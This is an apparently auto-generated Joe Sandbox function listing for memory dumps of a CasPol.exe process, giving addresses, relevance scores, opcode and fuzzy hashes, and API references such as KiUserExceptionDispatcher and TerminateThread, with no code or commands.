Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc576e6df83765a7325b65a29529b05ba476ba24b3b72c28efbd423ba3c839a4
Instruction ID: 6a82defb06ba7f69d9a5ab6815e81e7f8aa75b0b49ef27e611533388bca0a22a
Opcode Fuzzy Hash: dc576e6df83765a7325b65a29529b05ba476ba24b3b72c28efbd423ba3c839a4
Instruction Fuzzy Hash: 6402C675945339CFCB69EF70C988689B772BF48715F1141EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EE2B Relevance: 1.8, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 563d0779a21c1ea5f66663514293d4318634fd4201de402c3517cbfb431e9951
Instruction ID: 8f3878ca0b5f6b220780bb3c6b494706cbe37ea74bb0056456d337e7a2b3e4f7
Opcode Fuzzy Hash: 563d0779a21c1ea5f66663514293d4318634fd4201de402c3517cbfb431e9951
Instruction Fuzzy Hash: D002C675945339CFCB69EF70C988689B772BF48715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EE70 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: da78e0f038440dc0d9058468b0661ad5f7395c3d95ae88fcedc430c2e76e264b
Instruction ID: e3386672e9ac1a2a86e8d00f21b3aa863ecfbea16501169cb86d2ad78f52daaa
Opcode Fuzzy Hash: da78e0f038440dc0d9058468b0661ad5f7395c3d95ae88fcedc430c2e76e264b
Instruction Fuzzy Hash: 3202C675905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EEB5 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d79c44ae143b75250e8d9e7812c74346bfa8016e05b29b8b8b09ee1583e424ff
Instruction ID: 990b9a7dc5e79b38657c058253f768f111d40f83cfbe2e6ac4a17785b6078e26
Opcode Fuzzy Hash: d79c44ae143b75250e8d9e7812c74346bfa8016e05b29b8b8b09ee1583e424ff
Instruction Fuzzy Hash: FDF1A775905339CFCB69EF70C988689B772BF49715F1141EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EEFA Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c5e13b5c9d13675e01a5872dbe90b348c4764b38262a0da725432e20dda3957f
Instruction ID: 51233a58bf6a804df85da77398f0a3bc082c113ff34875229490b97c374a95e3
Opcode Fuzzy Hash: c5e13b5c9d13675e01a5872dbe90b348c4764b38262a0da725432e20dda3957f
Instruction Fuzzy Hash: A2F1A675905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EF3F Relevance: 1.8, APIs: 1, Instructions: 303COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c0161a0814d07526bf44859d46b47d357694d5b7a8cfc801477fc3d5eed2092f
Instruction ID: d3beb7f6775321809383de383e11545d76baf31286aaffdb93b8e0f6d8baea46
Opcode Fuzzy Hash: c0161a0814d07526bf44859d46b47d357694d5b7a8cfc801477fc3d5eed2092f
Instruction Fuzzy Hash: D5F1A675905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EF7B Relevance: 1.8, APIs: 1, Instructions: 298COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 086a0877b09b4a5172c28c9b39c3e2cacc03ea08c25bb39a63e0023b5fcaae0d
Instruction ID: c78120ed4339f4014b4fb547f928b339e9a0ba05b91deffb0800b002dd2e2d86
Opcode Fuzzy Hash: 086a0877b09b4a5172c28c9b39c3e2cacc03ea08c25bb39a63e0023b5fcaae0d
Instruction Fuzzy Hash: 5CF1A575905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EFC0 Relevance: 1.8, APIs: 1, Instructions: 289COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: df550122f538fb4b395a1ecd54658caa00841cf77c163fdb76bb2f1ce7fff73c
Instruction ID: c69ca88989d048fd84a126ab8a6b78c9a8c5c28ecc9b75fc27d2a45a04f196b4
Opcode Fuzzy Hash: df550122f538fb4b395a1ecd54658caa00841cf77c163fdb76bb2f1ce7fff73c
Instruction Fuzzy Hash: 39E1A575905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EFFC Relevance: 1.8, APIs: 1, Instructions: 284COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7d87296219df8bfb6e14f63ac1728eed1c6db141b0976a065476497d6f647bae
Instruction ID: f07697d141a604d7e5fa79783097eef321aa0a49f78e3933258353f9df47e0d7
Opcode Fuzzy Hash: 7d87296219df8bfb6e14f63ac1728eed1c6db141b0976a065476497d6f647bae
Instruction Fuzzy Hash: 4BE1A675905339CFCB69EF70C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11F041 Relevance: 1.8, APIs: 1, Instructions: 277COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a991d876de9a60897145c9386a6ff5d15c67fc97dfe2163f8eb2a24146ad3a44
Instruction ID: cb9b418f92b051bbcd110590f393df36ecd0a3706e98f58aed36308a024d87a4
Opcode Fuzzy Hash: a991d876de9a60897145c9386a6ff5d15c67fc97dfe2163f8eb2a24146ad3a44
Instruction Fuzzy Hash: 70E1B675905339CFCB69EF30C988689B772BF49715F1142EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00B10F1E Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00B10F25

Memory Dump Source

Source File: 0000000B.00000002.13994930274.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b00000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0f08abafc76b9130bce28ddbbb46db5a932ea7c5f7f65c12484b770c1dc7cf4b
Instruction ID: 77cb494af2b1a068e4147cbfe5248127b2b18b198c860bd9d478125a3d27ee67
Opcode Fuzzy Hash: 0f08abafc76b9130bce28ddbbb46db5a932ea7c5f7f65c12484b770c1dc7cf4b
Instruction Fuzzy Hash: 992105241083C68AEF226F78C9983DE3AD19F02310F5584A8DCC98F586E7B58581CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00A46920 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

Hk, xrefs: 00A46A07

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: Hk
API String ID: 0-2725002668
Opcode ID: 8f49559a47f8255ae2e2128a51857c1608e045f9086a263b5250fafa3ee63937
Instruction ID: 79a50656a313ac88823ad961b690807ae1e30936d53e04b19424d4ff9df4e5c8
Opcode Fuzzy Hash: 8f49559a47f8255ae2e2128a51857c1608e045f9086a263b5250fafa3ee63937
Instruction Fuzzy Hash: FB31C3353046519FDB068F24D968ABB3BB6EFC6355B05806AF846DB392CB34DC0587A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CC08 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

PHk, xrefs: 00A4CD40

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: PHk
API String ID: 0-517618362
Opcode ID: 08cbd86248f5330e80a476b481fd41b3c1b2117ff6297654cc88c5612af1516c
Instruction ID: f0f76c6ebb43c1719888c7bce288f5bbb7f688f2739bdfb46499420005a9161a
Opcode Fuzzy Hash: 08cbd86248f5330e80a476b481fd41b3c1b2117ff6297654cc88c5612af1516c
Instruction Fuzzy Hash: 4B31F035B002298FDB449F74C499AAEBBB2EFC8354B108529C41ADB354DF34DC09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CC18 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

PHk, xrefs: 00A4CD40

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: PHk
API String ID: 0-517618362
Opcode ID: af399e16bd1b6da9df8fee329c0da7214f8c7666809093cafdd8edbb03534f13
Instruction ID: 77dd01ae4762b41d1e2ec18284e33de2ca953b1898f8f637298c7a6776e98253
Opcode Fuzzy Hash: af399e16bd1b6da9df8fee329c0da7214f8c7666809093cafdd8edbb03534f13
Instruction Fuzzy Hash: 4031B035B002258FDB449B78C499AAE7BF6AFC9644B108439D41ADB394DF34DC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A44C48 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'k, xrefs: 00A44CC2

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: 4'k
API String ID: 0-2531104618
Opcode ID: 08a5ec88a915ac33f5ddfec6ee09590ef4686438391254aa26c2abc65bdf95f3
Instruction ID: e0bd1eecdaabcb5c204bace61666db1788f303a0e5c539ce6c0d078d50ac36bc
Opcode Fuzzy Hash: 08a5ec88a915ac33f5ddfec6ee09590ef4686438391254aa26c2abc65bdf95f3
Instruction Fuzzy Hash: B921D375B052A98BDB14CF2598E4B7B7BF9ABDA710F198126E812C7240DB31CD50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BFA8 Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a74904b7b152e84df997cea6aac5afe6f8a522eafb46fe560d161182505859
Instruction ID: 21a6aa1b9d9e98c9374e66cffe3cbd18184deed6933baab42570b525bbcf8c08
Opcode Fuzzy Hash: 34a74904b7b152e84df997cea6aac5afe6f8a522eafb46fe560d161182505859
Instruction Fuzzy Hash: B9227C34E052188FCB44DFB8C598AAEBBB2FF89314F108565D819EB351DB34AD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C738 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d73fdb4ebb00ec0ad3dc41171cd99cf7cf86757fbfdd357f7d207010eba731
Instruction ID: 2911ccd9f3721984bbb7b46229dd50465e60af6cef41f13bf69f9aa5c874601b
Opcode Fuzzy Hash: 10d73fdb4ebb00ec0ad3dc41171cd99cf7cf86757fbfdd357f7d207010eba731
Instruction Fuzzy Hash: C4E14E34B0E7858FD74787348C656A53FF29B97315B1A81E7D548CF6A3D628CC0A8722

Uniqueness

Uniqueness Score: -1.00%

Function 00A460A8 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a8ac6a3c0f0ef575e76a2f3ea361ddd7f37592669e14d878e745070e58e60b
Instruction ID: 3c435c15809aa7424c8c795b340653620eaece9fb4c80ef6f1c614dfdd47d4f5
Opcode Fuzzy Hash: 44a8ac6a3c0f0ef575e76a2f3ea361ddd7f37592669e14d878e745070e58e60b
Instruction Fuzzy Hash: E3D12B75A002549FCB04CFA9C58499DBBF2FF8A315B1A81A9E415EB362CB31FC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A45F88 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ced5b8a905211a1681cf74306a17813ec38e4984f53bb570d9546fa2818361a
Instruction ID: 557ec206811b4cdd9b00867801666cc1c1e6efdf021f5bdf483c67ff7430f171
Opcode Fuzzy Hash: 7ced5b8a905211a1681cf74306a17813ec38e4984f53bb570d9546fa2818361a
Instruction Fuzzy Hash: CDD10A75E002589FCB04CFA8C98499DBBF2FF8A315B1AC159E515AB3A2C731ED41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E181 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2628f7da80222850fd1030f2609fca70f8f8e8b66a572cb2e08e244b4fed2173
Instruction ID: 43ea48dc4d9013715cc6b3ab8c3e9b18de1c0fae28065ce4a487c3e306d7f7a7
Opcode Fuzzy Hash: 2628f7da80222850fd1030f2609fca70f8f8e8b66a572cb2e08e244b4fed2173
Instruction Fuzzy Hash: 8381F034B043198FCB05DB74C4A86AE7BB2BFC5308B158869D806CB785DF759C4A8B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E230 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2359cdabb740344d462617284c05b1a7c5579afd49c753ecc75be140c9c2ef
Instruction ID: 8676a0a49aa3da97ed9e695e0c741fd63b10161e0a8c55bfe66602bbf669c93e
Opcode Fuzzy Hash: dd2359cdabb740344d462617284c05b1a7c5579afd49c753ecc75be140c9c2ef
Instruction Fuzzy Hash: 96919135B103198FCB04EF74C5986AE77B2FF88309B118929D846DB740DF75AD4A8B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A466B0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8823587f7143c36b56726abb2eff095089a49264a6dc9bf6554e65f4616f63ac
Instruction ID: 1f62b53ea3c30a3cb0b51ac60c767951af19a9de6fb8106df461c1759574ab23
Opcode Fuzzy Hash: 8823587f7143c36b56726abb2eff095089a49264a6dc9bf6554e65f4616f63ac
Instruction Fuzzy Hash: 9E91B679A04215CFCB14CF68C984A9EBBB5FF86314F168069E815DB362C731EC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A4EC28 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ffcf10d722fdfccf1eb1c8e29a17409ec95633efd729d25e10b56435a30e9f
Instruction ID: d0104f21d111bb08f94b8055172cef1a3484ffec6b75be6d170cf0c4bb5332ca
Opcode Fuzzy Hash: 04ffcf10d722fdfccf1eb1c8e29a17409ec95633efd729d25e10b56435a30e9f
Instruction Fuzzy Hash: D6916D78E04319CBCB14EFB4C598A9EBBB2BF84344F218929D905AB354DF35AD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A42880 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f0541ca6d45a49bfe1d3da51fec24ec814406d4871c5920df2d51eebf62a275
Instruction ID: 155bc8a895d851a08c028bd8ab6a3095ffc794052c1efd8ba82a726810361716
Opcode Fuzzy Hash: 7f0541ca6d45a49bfe1d3da51fec24ec814406d4871c5920df2d51eebf62a275
Instruction Fuzzy Hash: BC710E397042108FDB159B34C4A8BBE77A2ABC9784F588078E956CB395CF34DC46C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A44B00 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf204aae415212efbb67a07dd11939045a378dd7e6edd6cebe17f331b2be8ed
Instruction ID: 72320f02f6c2cfb421df1359343e4c04c2114767662110cbbae1b744d3262449
Opcode Fuzzy Hash: 5cf204aae415212efbb67a07dd11939045a378dd7e6edd6cebe17f331b2be8ed
Instruction Fuzzy Hash: 1251AB797141158FCB14DF39C8D4B6A7BE9FF8C35531A41AAE80ACB361EB21DC018B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C519 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472ee81703244bcd8f06a1c6511669fae4fec9682af80fdc9cf6ae5710d7df77
Instruction ID: 09b005e025cf5ac2f6dc6cce53e1ad19340c3848214f526ab044151a78d4755e
Opcode Fuzzy Hash: 472ee81703244bcd8f06a1c6511669fae4fec9682af80fdc9cf6ae5710d7df77
Instruction Fuzzy Hash: 2E51C674E1532C9FCB00DFA4C4DA9DEBBB2BB58314B508A25D825A7314DB30AA4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A424E0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdebb3f67ffe32111e729cd08d77e46413d12a8e81e485776c1bd18b394df3bb
Instruction ID: d6305e524ac523d69cee79d3dd5ae2be300d09a79781fcf8a467b1ff333e3049
Opcode Fuzzy Hash: bdebb3f67ffe32111e729cd08d77e46413d12a8e81e485776c1bd18b394df3bb
Instruction Fuzzy Hash: 5541BF356042559FDF068F64C868AAF3FB2EF99304F45806AF915CB251CB38CD65CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C2C0 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d74147036276a9369aa782a7997280ce0c2e2e201fb9f7a195768f84ce027f
Instruction ID: 04c47e0b077dbc5232460e253d1deacfc33817fa0fdc69c13d99bbff18c64623
Opcode Fuzzy Hash: e7d74147036276a9369aa782a7997280ce0c2e2e201fb9f7a195768f84ce027f
Instruction Fuzzy Hash: ED319179F012198BDFA09FA9D58476EB765EBC6720F10483AD81EDB380DA24FC448792

Uniqueness

Uniqueness Score: -1.00%

Function 00A44D30 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23b87fee4040bb0ad19969cfcb16350b4bde38bebf6d6d1d1ff890c15b7048f
Instruction ID: 0fba9489ea9fc50b7f3bab249c712de9d64312e2f0339af0afd6198dca494e97
Opcode Fuzzy Hash: c23b87fee4040bb0ad19969cfcb16350b4bde38bebf6d6d1d1ff890c15b7048f
Instruction Fuzzy Hash: A72125383082214FDB2A17359895BFE3BA7BFD97587188079D906CB795EF29CC019392

Uniqueness

Uniqueness Score: -1.00%

Function 00A44D40 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ed7c61afdc2ba3c0d3bbcd782b4c6192d65657e5484c497adf30d4fb589c4c
Instruction ID: cf8ce09d8ed4cd3060da5a486f4249182209fa493701dfd476967b9b7928ed03
Opcode Fuzzy Hash: f3ed7c61afdc2ba3c0d3bbcd782b4c6192d65657e5484c497adf30d4fb589c4c
Instruction Fuzzy Hash: F321F6383042244BEB251725D495BBE3697BFC9758F588039D906CBB94EF2ACC429791

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BF49 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bca1417f2332c350f2bc552062bbb13d0d2fe2ef5164637ba7de2a7ab9047f0
Instruction ID: 94dcfc6eadefb7e88e332934f9c668f7521fe455ffab482c084681cffe12e036
Opcode Fuzzy Hash: 2bca1417f2332c350f2bc552062bbb13d0d2fe2ef5164637ba7de2a7ab9047f0
Instruction Fuzzy Hash: 1131E574A052498FCB44DFA8C984ADEBBF2EF85314F25806AD40CEB251D731D90ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 1CFFD3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.14013388806.000000001CFFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cffd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c8f0b9f9801d57fc94dfdbc22fea35eeb3405a56b1167b52b963d4d7f029d70
Instruction ID: 68db4001ddd084288ca7dd76537279df4de23f83b0642eaf009e0933357f7d63
Opcode Fuzzy Hash: 9c8f0b9f9801d57fc94dfdbc22fea35eeb3405a56b1167b52b963d4d7f029d70
Instruction Fuzzy Hash: ED21A172504240EFDB05DF14D9C0B17BB65FB98324F24C669D9894B2A6C336E856C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 1D00E330 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.14013551940.000000001D00D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D00D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d00d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d8e025d1d89a45395974903ac4dd43610c73223b3e986289b15ab0a3afc03d
Instruction ID: eb845cfbd7ad2365f9fcfcb15526cdb857d51f38e35bc2332d343e63111ec257
Opcode Fuzzy Hash: 99d8e025d1d89a45395974903ac4dd43610c73223b3e986289b15ab0a3afc03d
Instruction Fuzzy Hash: 8B21F271608240EFFB01CF14D9C8B1ABFA9FB84714F24C569E9495B282C736DC06CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00A42A30 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e116617147cec8663dbb24eec72b2559faaae1fc0ec58d8ac2d5c4118fe10fb3
Instruction ID: c11f445cc843a5ffe06d2ac99cff14e96f2f1cbbff7ef86922d76fd4476a406a
Opcode Fuzzy Hash: e116617147cec8663dbb24eec72b2559faaae1fc0ec58d8ac2d5c4118fe10fb3
Instruction Fuzzy Hash: 3A1104393046115FC7258B25C864A7A7BA6EFC569178540B9F906CB7A0CF20DC02C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E617 Relevance: .1, Instructions: 63COMMON

